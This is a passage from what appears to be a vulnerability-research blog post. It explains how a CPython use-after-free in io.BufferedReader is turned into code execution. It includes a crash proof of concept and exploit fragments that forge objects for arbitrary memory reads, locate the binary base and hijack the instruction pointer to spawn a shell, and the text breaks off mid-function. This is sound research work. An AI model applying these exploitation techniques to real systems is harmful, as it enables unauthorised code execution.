<li><strong>2023-03-07</strong> - public release of advisory</li>
</ul>
</li>
<li>File open TOCTOU
<ul>
<li>Assigned CVE-2023-27327 / <a href="https://www.zerodayinitiative.com/advisories/ZDI-23-215/">ZDI-23-215</a></li>
<li><strong>2022-11-03</strong> - reported to vendor</li>
<li><strong>2022-12-13</strong> - fix released in version 18.1.1</li>
<li><strong>2023-03-07</strong> - public release of advisory</li>
</ul>
</li>
</ul>Exploiting a Use-After-Free for code execution in every version of Python 32022-05-11T00:00:00+00:002022-05-11T00:00:00+00:00https://pwn.win/2022/05/11/python-buffered-reader<p>A while ago I was browsing the Python <a href="https://bugs.python.org">bug tracker</a>, and I stumbled upon this bug - “<a href="https://bugs.python.org/issue15994">memoryview to freed memory can cause segfault</a>”. It was created in 2012, originally present in Python 2.7, but remains open to this day, 10 years later. This piqued my interest, so I decided to take a closer look.</p>
<p>What follows is a breakdown of the root cause and how I wrote a reliable exploit which works in every version of Python 3.</p>
<h2 id="python-objects">Python Objects</h2>
<p>To understand anything happening in CPython it’s important to have an understanding of how objects are represented internally. I’ll give a brief introduction here, but there are several (better) resources on the internet for learning about this.</p>
<p>Everything in Python is an object. CPython represents these objects with the <code class="language-plaintext highlighter-rouge">PyObject</code> struct. Every type of object extends the basic <code class="language-plaintext highlighter-rouge">PyObject</code> struct with their own specific fields. A <code class="language-plaintext highlighter-rouge">PyObject</code> looks like this:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">typedef</span> <span class="k">struct</span> <span class="n">_object</span> <span class="p">{</span>
<span class="n">Py_ssize_t</span> <span class="n">ob_refcnt</span><span class="p">;</span>
<span class="n">PyTypeObject</span> <span class="o">*</span><span class="n">ob_type</span><span class="p">;</span>
<span class="p">}</span> <span class="n">PyObject</span><span class="p">;</span>
</code></pre></div></div>
<p>A list, for example, is represented by a <code class="language-plaintext highlighter-rouge">PyListObject</code>, which looks roughly like this:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">typedef</span> <span class="k">struct</span> <span class="p">{</span>
<span class="n">PyObject</span> <span class="n">ob_base</span><span class="p">;</span>
<span class="n">Py_ssize_t</span> <span class="n">ob_size</span><span class="p">;</span>
<span class="n">PyObject</span> <span class="o">**</span><span class="n">ob_item</span><span class="p">;</span>
<span class="n">Py_ssize_t</span> <span class="n">allocated</span><span class="p">;</span>
<span class="p">}</span> <span class="n">PyListObject</span><span class="p">;</span>
</code></pre></div></div>
<p>We can see that every object has a refcount (<code class="language-plaintext highlighter-rouge">ob_refcnt</code>) and a pointer to its corresponding type object (<code class="language-plaintext highlighter-rouge">ob_type</code>), both stored in <code class="language-plaintext highlighter-rouge">ob_base</code>. The type object is a singleton and there exists one for every type in the Python language. For example, an int will point to <code class="language-plaintext highlighter-rouge">PyLong_Type</code>, and a list will point to <code class="language-plaintext highlighter-rouge">PyList_Type</code>.</p>
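<p>As a rough illustration of this layout, the sketch below peeks at a live list with <code class="language-plaintext highlighter-rouge">ctypes</code>. It assumes CPython, where <code class="language-plaintext highlighter-rouge">id()</code> returns the object's address and <code class="language-plaintext highlighter-rouge">ob_type</code> is the last field of the <code class="language-plaintext highlighter-rouge">PyObject</code> header; the variable names are made up for the example.</p>

```python
import ctypes

items = [1, 2, 3]

# Assumption: object.__basicsize__ equals sizeof(PyObject), and ob_type is
# the final pointer-sized field of that header.
header_size = object.__basicsize__
ptr_size = ctypes.sizeof(ctypes.c_void_p)

# ob_type: pointer to the type object (PyList_Type for a list).
type_ptr = ctypes.c_void_p.from_address(id(items) + header_size - ptr_size).value

# ob_size: first field after the header in a variable-sized object.
ob_size = ctypes.c_ssize_t.from_address(id(items) + header_size).value

print(hex(type_ptr), hex(id(list)), ob_size)
```

<p>The two addresses printed should match, since <code class="language-plaintext highlighter-rouge">id(list)</code> is the address of the list type object itself.</p>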
<p>With that out of the way, let’s look at the PoC.</p>
<h2 id="proof-of-concept">Proof of Concept</h2>
<p>The author of the bug report kindly included a proof of concept which will trigger a null pointer dereference. You can see that here:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">io</span>

<span class="k">class</span> <span class="nc">File</span><span class="p">(</span><span class="n">io</span><span class="p">.</span><span class="n">RawIOBase</span><span class="p">):</span>
    <span class="k">def</span> <span class="nf">readinto</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">buf</span><span class="p">):</span>
        <span class="k">global</span> <span class="n">view</span>
        <span class="n">view</span> <span class="o">=</span> <span class="n">buf</span>
    <span class="k">def</span> <span class="nf">readable</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
        <span class="k">return</span> <span class="bp">True</span>

<span class="n">f</span> <span class="o">=</span> <span class="n">io</span><span class="p">.</span><span class="n">BufferedReader</span><span class="p">(</span><span class="n">File</span><span class="p">())</span>
<span class="n">f</span><span class="p">.</span><span class="n">read</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="c1"># get view of buffer used by BufferedReader
</span><span class="k">del</span> <span class="n">f</span> <span class="c1"># deallocate buffer
</span><span class="n">view</span> <span class="o">=</span> <span class="n">view</span><span class="p">.</span><span class="n">cast</span><span class="p">(</span><span class="s">'P'</span><span class="p">)</span>
<span class="n">L</span> <span class="o">=</span> <span class="p">[</span><span class="bp">None</span><span class="p">]</span> <span class="o">*</span> <span class="nb">len</span><span class="p">(</span><span class="n">view</span><span class="p">)</span> <span class="c1"># create list whose array has same size
</span>                       <span class="c1"># (this will probably coincide with view)
</span><span class="n">view</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span> <span class="c1"># overwrite first item with NULL
</span><span class="k">print</span><span class="p">(</span><span class="n">L</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span> <span class="c1"># segfault: dereferencing NULL
</span></code></pre></div></div>
<h2 id="root-cause">Root Cause</h2>
<p>The comments in the PoC provide some indication as to what is going on, but I’ll try to break it down further.</p>
<p>This bug is a fairly typical use-after-free, but to understand it we must first understand what <code class="language-plaintext highlighter-rouge">io.BufferedReader</code> does. The <a href="https://docs.python.org/3/library/io.html#io.BufferedReader">documentation</a> does a good job of explaining it:</p>
<blockquote>
<p>A buffered binary stream providing higher-level access to a readable, non seekable <a href="https://docs.python.org/3/library/io.html#io.RawIOBase" title="io.RawIOBase"><code class="language-plaintext highlighter-rouge">RawIOBase</code></a> raw binary stream. It inherits <a href="https://docs.python.org/3/library/io.html#io.BufferedIOBase" title="io.BufferedIOBase"><code class="language-plaintext highlighter-rouge">BufferedIOBase</code></a>.</p>
<p>When reading data from [the BufferedReader], a larger amount of data may be requested from the underlying raw stream, and kept in an internal buffer. The buffered data can then be returned directly on subsequent reads.</p>
</blockquote>
<p>In the proof of concept we first define a class called <code class="language-plaintext highlighter-rouge">File</code>, which inherits from <code class="language-plaintext highlighter-rouge">io.RawIOBase</code>, and define some methods on it. We then create a <code class="language-plaintext highlighter-rouge">BufferedReader</code> object, specifying an instance of the custom <code class="language-plaintext highlighter-rouge">File</code> class as the underlying raw stream.</p>
<p>When the <code class="language-plaintext highlighter-rouge">BufferedReader</code> is initialized it <a href="https://github.com/python/cpython/blob/3.10/Modules/_io/bufferedio.c#L732">allocates</a> an internal buffer. When we read from the buffered reader (the <code class="language-plaintext highlighter-rouge">f.read(1)</code> call) and the data doesn’t exist in its internal buffer, it will <a href="https://github.com/python/cpython/blob/3.10/Modules/_io/bufferedio.c#L1476">read</a> from the underlying stream. The read from the underlying stream happens via the <a href="https://docs.python.org/3/library/io.html#io.RawIOBase.readinto"><code class="language-plaintext highlighter-rouge">readinto</code></a> function, which receives a buffer that the raw stream is supposed to read data into. The buffer passed as an argument is actually a <a href="https://docs.python.org/3/library/stdtypes.html#memoryview"><code class="language-plaintext highlighter-rouge">memoryview</code></a> which is <a href="https://github.com/python/cpython/blob/3.10/Modules/_io/bufferedio.c#L1467">backed by</a> the <code class="language-plaintext highlighter-rouge">BufferedReader</code>’s internal buffer. You can think of the <code class="language-plaintext highlighter-rouge">memoryview</code> as a pointer to, or a view of, the internal buffer.</p>
<p>Given that we control the underlying stream object, we can make the <code class="language-plaintext highlighter-rouge">readinto</code> function save a reference to this <code class="language-plaintext highlighter-rouge">memoryview</code> argument, which will persist even once we’ve returned from the function. This is exactly what the PoC does with <code class="language-plaintext highlighter-rouge">view = buf</code>.</p>
<p>Once we have saved a reference to the <code class="language-plaintext highlighter-rouge">memoryview</code> we can delete the <code class="language-plaintext highlighter-rouge">BufferedReader</code> object. This will force the internal buffer to be <a href="https://github.com/python/cpython/blob/3.10/Modules/_io/bufferedio.c#L523">freed</a>, even though we still have a reference to our friendly <code class="language-plaintext highlighter-rouge">memoryview</code>, which is now pointing to a freed buffer.</p>
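<p>To see what <code class="language-plaintext highlighter-rouge">readinto</code> actually receives without touching freed memory, here is a small, harmless probe. The <code class="language-plaintext highlighter-rouge">Probe</code> class and the <code class="language-plaintext highlighter-rouge">seen</code> dict are hypothetical names for this sketch; it only inspects the argument while the call is in progress and keeps no reference to it.</p>

```python
import io

seen = {}

class Probe(io.RawIOBase):
    def readable(self):
        return True

    def readinto(self, buf):
        # Record what the BufferedReader handed us, then report EOF.
        seen["type"] = type(buf).__name__
        seen["nbytes"] = buf.nbytes
        return 0

# buffer_size sets the size of the reader's internal buffer.
reader = io.BufferedReader(Probe(), buffer_size=4096)
data = reader.read(1)

print(seen, data)
```

<p>The argument is a <code class="language-plaintext highlighter-rouge">memoryview</code> spanning the whole internal buffer, not just the one byte that was requested.</p>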
<h2 id="exploitation">Exploitation</h2>
<p>Now that we have a memoryview pointing to freed heap memory, which we can read from or write to, where do we go from here?</p>
<p>The easiest approach for exploitation is to create a list with length equal to the length of the freed buffer, which will very likely have its item buffer (<code class="language-plaintext highlighter-rouge">ob_item</code>) allocated in the same place as the freed buffer. This will mean we get two different “views” on the same piece of memory. One view, the <code class="language-plaintext highlighter-rouge">memoryview</code>, thinks that the memory is just an array of bytes, which we can write to or read from arbitrarily. The second view is the list we created, which thinks that the memory is a list of <code class="language-plaintext highlighter-rouge">PyObject</code> pointers. This means we can create fake <code class="language-plaintext highlighter-rouge">PyObject</code>s somewhere in memory, write their addresses into the list by writing to the <code class="language-plaintext highlighter-rouge">memoryview</code>, and then access them by indexing into the list.</p>
<p>In the case of the PoC, they write <code class="language-plaintext highlighter-rouge">0</code> to the buffer (<code class="language-plaintext highlighter-rouge">view[0] = 0</code>), and then access it with <code class="language-plaintext highlighter-rouge">print(L[0])</code>. <code class="language-plaintext highlighter-rouge">L[0]</code> gets the first <code class="language-plaintext highlighter-rouge">PyObject*</code> which is <code class="language-plaintext highlighter-rouge">0</code> and then <code class="language-plaintext highlighter-rouge">print</code> tries to access some fields on it, resulting in a null pointer dereference.</p>
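<p>The "write an address through the byte view" half of this idea can be tried safely on ordinary memory. The sketch below uses a <code class="language-plaintext highlighter-rouge">bytearray</code> as a stand-in for the freed buffer (an assumption for illustration only; nothing here is freed) and the same <code class="language-plaintext highlighter-rouge">cast('P')</code> call as the PoC.</p>

```python
import struct
import sys

ptr_size = struct.calcsize("P")

# Stand-in for the shared memory region: room for four pointers.
backing = bytearray(4 * ptr_size)
slots = memoryview(backing).cast("P")   # view the bytes as pointer-sized slots

target = object()
slots[0] = id(target)                   # store an object's address in slot 0

# The same address is now visible as raw bytes in the underlying buffer.
raw = bytes(backing[:ptr_size])
print(hex(int.from_bytes(raw, sys.byteorder)), hex(id(target)))
```

<p>In the exploit, the list's <code class="language-plaintext highlighter-rouge">ob_item</code> array plays the role of <code class="language-plaintext highlighter-rouge">backing</code>, so whatever address is stored in slot 0 becomes <code class="language-plaintext highlighter-rouge">L[0]</code>.</p>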
<p>Given that this bug is present on every version of Python since at least Python 2.7, I wanted my exploit to work on as many versions of Python 3 as I could, just for fun. I decided against writing it for Python 2 because there are some differences in the languages which I didn’t want to account for in my exploit, but it’s absolutely possible to tweak my code to get this to work there. This meant that I couldn’t rely on any hardcoded offsets into the CPython binary, or into libc. Instead I chose to use known struct offsets (which haven’t changed between Python versions), some manual ELF parsing, and some known linker behaviour, to get a reliable exploit.</p>
<p>The goal of the exploit is to call <code class="language-plaintext highlighter-rouge">system("/bin/sh")</code>. The steps are as follows:</p>
<ol>
<li>Leak CPython binary function pointer</li>
<li>Calculate the base address of CPython</li>
<li>Calculate the address of <code class="language-plaintext highlighter-rouge">system</code> or its PLT stub</li>
<li>Jump to this address with the first argument pointing to <code class="language-plaintext highlighter-rouge">/bin/sh</code></li>
<li>Win</li>
</ol>
<h3 id="getting-a-leak">Getting a leak</h3>
<p>Leaking arbitrary amounts of data from an arbitrary location turned out to be pretty easy. We can use a specially crafted <code class="language-plaintext highlighter-rouge">bytearray</code> object. The layout of a <code class="language-plaintext highlighter-rouge">bytearray</code> looks like this:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">typedef</span> <span class="k">struct</span> <span class="p">{</span>
<span class="n">PyObject_VAR_HEAD</span>
<span class="n">Py_ssize_t</span> <span class="n">ob_alloc</span><span class="p">;</span> <span class="cm">/* How many bytes allocated in ob_bytes */</span>
<span class="kt">char</span> <span class="o">*</span><span class="n">ob_bytes</span><span class="p">;</span> <span class="cm">/* Physical backing buffer */</span>
<span class="kt">char</span> <span class="o">*</span><span class="n">ob_start</span><span class="p">;</span> <span class="cm">/* Logical start inside ob_bytes */</span>
<span class="n">Py_ssize_t</span> <span class="n">ob_exports</span><span class="p">;</span> <span class="cm">/* How many buffer exports */</span>
<span class="p">}</span> <span class="n">PyByteArrayObject</span><span class="p">;</span>
</code></pre></div></div>
<p><code class="language-plaintext highlighter-rouge">ob_bytes</code> is a pointer to a heap-allocated buffer. When we read from or write to the bytearray, we’re reading/writing to this heap buffer. If we can craft a fake <code class="language-plaintext highlighter-rouge">bytearray</code> object, and we can set <code class="language-plaintext highlighter-rouge">ob_bytes</code> to point to an arbitrary address, then we can read or write to this arbitrary address by reading or writing to this <code class="language-plaintext highlighter-rouge">bytearray</code>.</p>
<p>Crafting fake objects is made very easy by CPython. If you create a <code class="language-plaintext highlighter-rouge">bytes</code> object (this is not the same thing as a <code class="language-plaintext highlighter-rouge">bytearray</code>), the raw data within the <code class="language-plaintext highlighter-rouge">bytes</code> object is always present 32 bytes after the start of the <code class="language-plaintext highlighter-rouge">PyBytesObject</code>, in one contiguous chunk. We can get the address of the <code class="language-plaintext highlighter-rouge">PyBytesObject</code> with the <code class="language-plaintext highlighter-rouge">id</code> function, and we know the offset to our data, so we can do something like this:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">fake</span> <span class="o">=</span> <span class="sa">b</span><span class="s">''</span><span class="p">.</span><span class="n">join</span><span class="p">([</span>
<span class="sa">b</span><span class="s">'AAAAAAAA'</span><span class="p">,</span> <span class="c1"># refcount
</span> <span class="sa">b</span><span class="s">'BBBBBBBB'</span><span class="p">,</span> <span class="c1"># type object pointer
</span> <span class="sa">b</span><span class="s">'CCCC'</span> <span class="c1"># other object data...
</span> <span class="p">])</span>
<span class="n">address_of_fake_object</span> <span class="o">=</span> <span class="nb">id</span><span class="p">(</span><span class="n">fake</span><span class="p">)</span> <span class="o">+</span> <span class="mi">32</span>
</code></pre></div></div>
<p>Now <code class="language-plaintext highlighter-rouge">address_of_fake_object</code> will be the address of <code class="language-plaintext highlighter-rouge">AAAAAAAABBBBBBBBCCCC...</code>.</p>
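<p>The offset can be sanity-checked on a running interpreter. This sketch assumes CPython and uses <code class="language-plaintext highlighter-rouge">ctypes</code> purely for verification (the exploit itself needs no imports); it derives the offset from <code class="language-plaintext highlighter-rouge">bytes.__basicsize__</code>, which counts the header plus one byte for the trailing NUL, rather than hardcoding 32.</p>

```python
import ctypes

fake = b"AAAAAAAABBBBBBBBCCCC"

# Assumption: tp_basicsize of bytes is offsetof(PyBytesObject, ob_sval) + 1.
data_offset = bytes.__basicsize__ - 1

# Read len(fake) raw bytes starting at the computed address.
recovered = ctypes.string_at(id(fake) + data_offset, len(fake))

print(data_offset, recovered)
```

<p>On a typical 64-bit build this prints an offset of 32 followed by the original bytes.</p>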
<p>The final leak primitive is shown below. Note that <code class="language-plaintext highlighter-rouge">self.freed_buffer</code> is the <code class="language-plaintext highlighter-rouge">memoryview</code> pointing to the freed heap buffer, and <code class="language-plaintext highlighter-rouge">self.fake_objs</code> is the list we created whose item buffer also points to the freed heap buffer.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">_create_fake_byte_array</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">addr</span><span class="p">,</span> <span class="n">size</span><span class="p">):</span>
    <span class="n">byte_array_obj</span> <span class="o">=</span> <span class="n">flat</span><span class="p">(</span>
        <span class="n">p64</span><span class="p">(</span><span class="mi">10</span><span class="p">),</span> <span class="c1"># refcount
</span>        <span class="n">p64</span><span class="p">(</span><span class="nb">id</span><span class="p">(</span><span class="nb">bytearray</span><span class="p">)),</span> <span class="c1"># type obj
</span>        <span class="n">p64</span><span class="p">(</span><span class="n">size</span><span class="p">),</span> <span class="c1"># ob_size
</span>        <span class="n">p64</span><span class="p">(</span><span class="n">size</span><span class="p">),</span> <span class="c1"># ob_alloc
</span>        <span class="n">p64</span><span class="p">(</span><span class="n">addr</span><span class="p">),</span> <span class="c1"># ob_bytes
</span>        <span class="n">p64</span><span class="p">(</span><span class="n">addr</span><span class="p">),</span> <span class="c1"># ob_start
</span>        <span class="n">p64</span><span class="p">(</span><span class="mh">0x0</span><span class="p">),</span> <span class="c1"># ob_exports
</span>    <span class="p">)</span>
    <span class="bp">self</span><span class="p">.</span><span class="n">no_gc</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">byte_array_obj</span><span class="p">)</span> <span class="c1"># stop gc from freeing after we return
</span>    <span class="bp">self</span><span class="p">.</span><span class="n">freed_buffer</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="nb">id</span><span class="p">(</span><span class="n">byte_array_obj</span><span class="p">)</span> <span class="o">+</span> <span class="mi">32</span>

<span class="k">def</span> <span class="nf">leak</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">addr</span><span class="p">,</span> <span class="n">length</span><span class="p">):</span>
    <span class="bp">self</span><span class="p">.</span><span class="n">_create_fake_byte_array</span><span class="p">(</span><span class="n">addr</span><span class="p">,</span> <span class="n">length</span><span class="p">)</span>
    <span class="k">return</span> <span class="bp">self</span><span class="p">.</span><span class="n">fake_objs</span><span class="p">[</span><span class="mi">0</span><span class="p">][</span><span class="mi">0</span><span class="p">:</span><span class="n">length</span><span class="p">]</span>
</code></pre></div></div>
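<p>The snippet above relies on <code class="language-plaintext highlighter-rouge">p64</code>, <code class="language-plaintext highlighter-rouge">u64</code> and <code class="language-plaintext highlighter-rouge">flat</code> helpers that are not shown in this post. Since the exploit uses no imports, they are presumably small local functions; the versions below are my guess at minimal stand-ins, not the exploit's actual definitions.</p>

```python
def p64(value):
    """Pack an unsigned integer into 8 little-endian bytes."""
    return value.to_bytes(8, "little")

def u64(data):
    """Unpack the first 8 bytes of data as a little-endian unsigned integer."""
    return int.from_bytes(data[:8], "little")

def flat(*chunks):
    """Concatenate already-packed byte strings into one contiguous blob."""
    return b"".join(chunks)

header = flat(p64(10), p64(0x7F0000001000))
print(len(header), hex(u64(header[8:16])))
```

<p>Each field of a fake object is exactly 8 bytes wide on x86-64, which is why everything is built out of <code class="language-plaintext highlighter-rouge">p64</code> values.</p>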
<h3 id="finding-the-base-of-cpython">Finding the base of cpython</h3>
<p>Now that we have a leak primitive, we can use it to find the base address of the binary. For this we need a pointer into the binary. One object which hasn’t obviously changed in any version of Python 3, and has pointers into the CPython binary, is the <a href="https://github.com/python/cpython/blob/3.10/Objects/longobject.c#L5622"><code class="language-plaintext highlighter-rouge">PyLong_Type</code></a> object. I chose to use the pointer at offset 24, which in the standard 64-bit <code class="language-plaintext highlighter-rouge">PyTypeObject</code> layout is the <code class="language-plaintext highlighter-rouge">tp_name</code> member (<code class="language-plaintext highlighter-rouge">tp_dealloc</code> follows at offset 48) and points to the type's name string inside the binary, but I could have just as easily chosen another pointer in the same object, or in another object entirely.</p>
<p style="text-align: center;"><img src="/assets/python-buffered-reader/int_type_obj.png" alt="The type object of an `int` object at runtime" width="500" /></p>
<p>Once we have a pointer into the binary, we can round it down to the nearest page and then walk backwards one page at a time until we find the ELF header. This works because we know that the binary will be mapped at a page aligned address.</p>
<p>All of this looks like:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">find_bin_base</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
    <span class="c1"># Leak a pointer from PyLong_Type (offset 24) which points into the
</span>    <span class="c1"># Python binary.
</span>    <span class="n">leak</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">leak</span><span class="p">(</span><span class="nb">id</span><span class="p">(</span><span class="nb">int</span><span class="p">),</span> <span class="mi">32</span><span class="p">)</span>
    <span class="n">cpython_binary_ptr</span> <span class="o">=</span> <span class="n">u64</span><span class="p">(</span><span class="n">leak</span><span class="p">[</span><span class="mi">24</span><span class="p">:</span><span class="mi">32</span><span class="p">])</span>
    <span class="n">addr</span> <span class="o">=</span> <span class="p">(</span><span class="n">cpython_binary_ptr</span> <span class="o">>></span> <span class="mi">12</span><span class="p">)</span> <span class="o"><<</span> <span class="mi">12</span> <span class="c1"># page align the address
</span>    <span class="c1"># Work backwards in pages until we find the start of the binary
</span>    <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">10000</span><span class="p">):</span>
        <span class="n">nxt</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">leak</span><span class="p">(</span><span class="n">addr</span><span class="p">,</span> <span class="mi">4</span><span class="p">)</span>
        <span class="k">if</span> <span class="n">nxt</span> <span class="o">==</span> <span class="sa">b</span><span class="s">'</span><span class="se">\x7f</span><span class="s">ELF'</span><span class="p">:</span>
            <span class="k">return</span> <span class="n">addr</span>
        <span class="n">addr</span> <span class="o">-=</span> <span class="n">PAGE_SIZE</span>
    <span class="k">return</span> <span class="bp">None</span>
</code></pre></div></div>
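<p>The page-alignment step is easy to check in isolation. The pointer value below is made up for illustration, and a 4 KiB page size is assumed.</p>

```python
PAGE_SIZE = 0x1000  # assumption: 4 KiB pages

ptr = 0x55D2C3A4F7B8  # hypothetical leaked pointer into the binary

# Two equivalent ways to clear the low 12 bits.
by_shift = (ptr >> 12) << 12
by_mask = ptr & ~(PAGE_SIZE - 1)

print(hex(by_shift), hex(by_mask))
```

<p>Both expressions give the start of the page containing the pointer, which is the first candidate checked for the <code class="language-plaintext highlighter-rouge">\x7fELF</code> magic.</p>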
<h3 id="instruction-pointer-control">Instruction pointer control</h3>
<p>Recall that every <code class="language-plaintext highlighter-rouge">PyObject</code> has a pointer to its type object, e.g. a <code class="language-plaintext highlighter-rouge">PyLongObject</code> has a pointer to <code class="language-plaintext highlighter-rouge">PyLong_Type</code>, and a <code class="language-plaintext highlighter-rouge">PyListObject</code> has a pointer to <code class="language-plaintext highlighter-rouge">PyList_Type</code>. Every type object effectively functions as a vtable (amongst other things), which means there are lots of nice function pointers there. With this information it’s clear that if we can fake a <code class="language-plaintext highlighter-rouge">PyObject</code> and point it to a fake type object, and cause one of the vtable functions to be called, we can get control of the instruction pointer.</p>
<p>This is easy to set up with the aforementioned trick for creating fake objects, and we can trigger the <code class="language-plaintext highlighter-rouge">tp_getattro</code> function pointer by attempting to access a field on the fake object.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">set_rip</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">addr</span><span class="p">,</span> <span class="n">obj_refcount</span><span class="o">=</span><span class="mh">0x10</span><span class="p">):</span>
    <span class="s">"""Set rip by using a fake object and associated type object."""</span>
    <span class="c1"># Fake type object
</span>    <span class="n">type_obj</span> <span class="o">=</span> <span class="n">flat</span><span class="p">(</span>
        <span class="n">p64</span><span class="p">(</span><span class="mh">0xac1dc0de</span><span class="p">),</span> <span class="c1"># refcount
</span>        <span class="sa">b</span><span class="s">'X'</span><span class="o">*</span><span class="mh">0x68</span><span class="p">,</span> <span class="c1"># padding
</span>        <span class="n">p64</span><span class="p">(</span><span class="n">addr</span><span class="p">)</span><span class="o">*</span><span class="mi">100</span><span class="p">,</span> <span class="c1"># vtable funcs
</span>    <span class="p">)</span>
    <span class="bp">self</span><span class="p">.</span><span class="n">no_gc</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">type_obj</span><span class="p">)</span>
    <span class="c1"># Fake PyObject
</span>    <span class="n">data</span> <span class="o">=</span> <span class="n">flat</span><span class="p">(</span>
        <span class="n">p64</span><span class="p">(</span><span class="n">obj_refcount</span><span class="p">),</span> <span class="c1"># refcount
</span>        <span class="n">p64</span><span class="p">(</span><span class="nb">id</span><span class="p">(</span><span class="n">type_obj</span><span class="p">)),</span> <span class="c1"># pointer to fake type object
</span>    <span class="p">)</span>
    <span class="bp">self</span><span class="p">.</span><span class="n">no_gc</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">data</span><span class="p">)</span>
    <span class="c1"># The bytes data starts at offset 32 in the object
</span>    <span class="bp">self</span><span class="p">.</span><span class="n">freed_buffer</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="nb">id</span><span class="p">(</span><span class="n">data</span><span class="p">)</span> <span class="o">+</span> <span class="mi">32</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="c1"># Now we trigger it. This calls tp_getattro on our fake type object
</span>        <span class="bp">self</span><span class="p">.</span><span class="n">fake_objs</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="n">trigger</span>
    <span class="k">except</span><span class="p">:</span>
        <span class="c1"># Avoid messy error output when we exit our shell
</span>        <span class="k">pass</span>
</code></pre></div></div>
<p>I provide a way to set the refcount of the fake object because when calling a function from the vtable, the first argument to the function is a pointer to the object itself, and if the vtable function is actually <code class="language-plaintext highlighter-rouge">system</code>, then the first bytes of the object are going to be interpreted as the command to execute. Therefore when creating the fake object for calling <code class="language-plaintext highlighter-rouge">system</code>, we can set the refcount to <code class="language-plaintext highlighter-rouge">/bin/sh\x00</code>.</p>
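<p>This works out neatly because <code class="language-plaintext highlighter-rouge">/bin/sh</code> plus its terminating NUL is exactly 8 bytes, the size of the refcount field on x86-64. A quick sketch of the conversion (variable names are illustrative):</p>

```python
command = b"/bin/sh\x00"

# Interpret the 8 command bytes as the little-endian integer that would be
# passed as obj_refcount.
obj_refcount = int.from_bytes(command, "little")

# Packing it back gives the bytes that sit at the start of the fake object.
first_bytes = obj_refcount.to_bytes(8, "little")

print(hex(obj_refcount), first_bytes)
```

<p>When <code class="language-plaintext highlighter-rouge">system</code> receives a pointer to the fake object, it reads those bytes as a C string and stops at the NUL, before it reaches the type pointer.</p>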
<h3 id="locating-system">Locating system</h3>
<p>All versions of Python import <code class="language-plaintext highlighter-rouge">system</code> from libc, so, assuming Python is dynamically linked, we know that there’ll be an entry in the PLT for <code class="language-plaintext highlighter-rouge">system</code>. We just need to work out the address of this entry to be able to call it. Fortunately we can work this out through some parsing of the ELF structures.</p>
<p>The steps to do this are as follows:</p>
<ul>
<li>Use our arbitrary leak to leak the ELF headers</li>
<li>Parse the <a href="https://en.wikipedia.org/wiki/Executable_and_Linkable_Format#Program_header">program headers</a> looking for the header of type <code class="language-plaintext highlighter-rouge">PT_DYNAMIC</code>. This will give us the address of the <code class="language-plaintext highlighter-rouge">.dynamic</code> section</li>
<li>Parse the <code class="language-plaintext highlighter-rouge">.dynamic</code> section, extracting the <code class="language-plaintext highlighter-rouge">DT_JMPREL</code>, <code class="language-plaintext highlighter-rouge">DT_SYMTAB</code>, <code class="language-plaintext highlighter-rouge">DT_STRTAB</code>, <code class="language-plaintext highlighter-rouge">DT_PLTGOT</code> and <code class="language-plaintext highlighter-rouge">DT_INIT</code> values, which give us the addresses of the various structures we need</li>
<li>Walk the relocation table. For each item, get the offset into the symbol table, and use that to get the offset into the string table, which gives the corresponding function name</li>
<li>Keep walking the relocation table until we find the entry corresponding to <code class="language-plaintext highlighter-rouge">system</code>.</li>
</ul>
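<p>The first three steps can be sketched as follows. This is not the exploit's code: it assumes a 64-bit little-endian ELF and a hypothetical <code class="language-plaintext highlighter-rouge">read(addr, n)</code> callable standing in for the leak primitive, and it runs against a tiny synthetic image built in the snippet rather than a real process.</p>

```python
import struct

PT_DYNAMIC = 2
DT_NULL = 0
WANTED_TAGS = {3: "DT_PLTGOT", 5: "DT_STRTAB", 6: "DT_SYMTAB",
               12: "DT_INIT", 23: "DT_JMPREL"}

def find_dynamic(read, base):
    """Return p_vaddr of the PT_DYNAMIC program header, or None."""
    ehdr = read(base, 64)                                  # Elf64_Ehdr
    (e_phoff,) = struct.unpack_from("<Q", ehdr, 0x20)
    e_phentsize, e_phnum = struct.unpack_from("<HH", ehdr, 0x36)
    for i in range(e_phnum):
        phdr = read(base + e_phoff + i * e_phentsize, 56)  # Elf64_Phdr
        (p_type,) = struct.unpack_from("<I", phdr, 0)
        if p_type == PT_DYNAMIC:
            (p_vaddr,) = struct.unpack_from("<Q", phdr, 0x10)
            return p_vaddr
    return None

def parse_dynamic(read, dyn_addr):
    """Collect the wanted d_tag -> d_val pairs until DT_NULL."""
    found = {}
    while True:
        d_tag, d_val = struct.unpack("<qQ", read(dyn_addr, 16))  # Elf64_Dyn
        if d_tag == DT_NULL:
            return found
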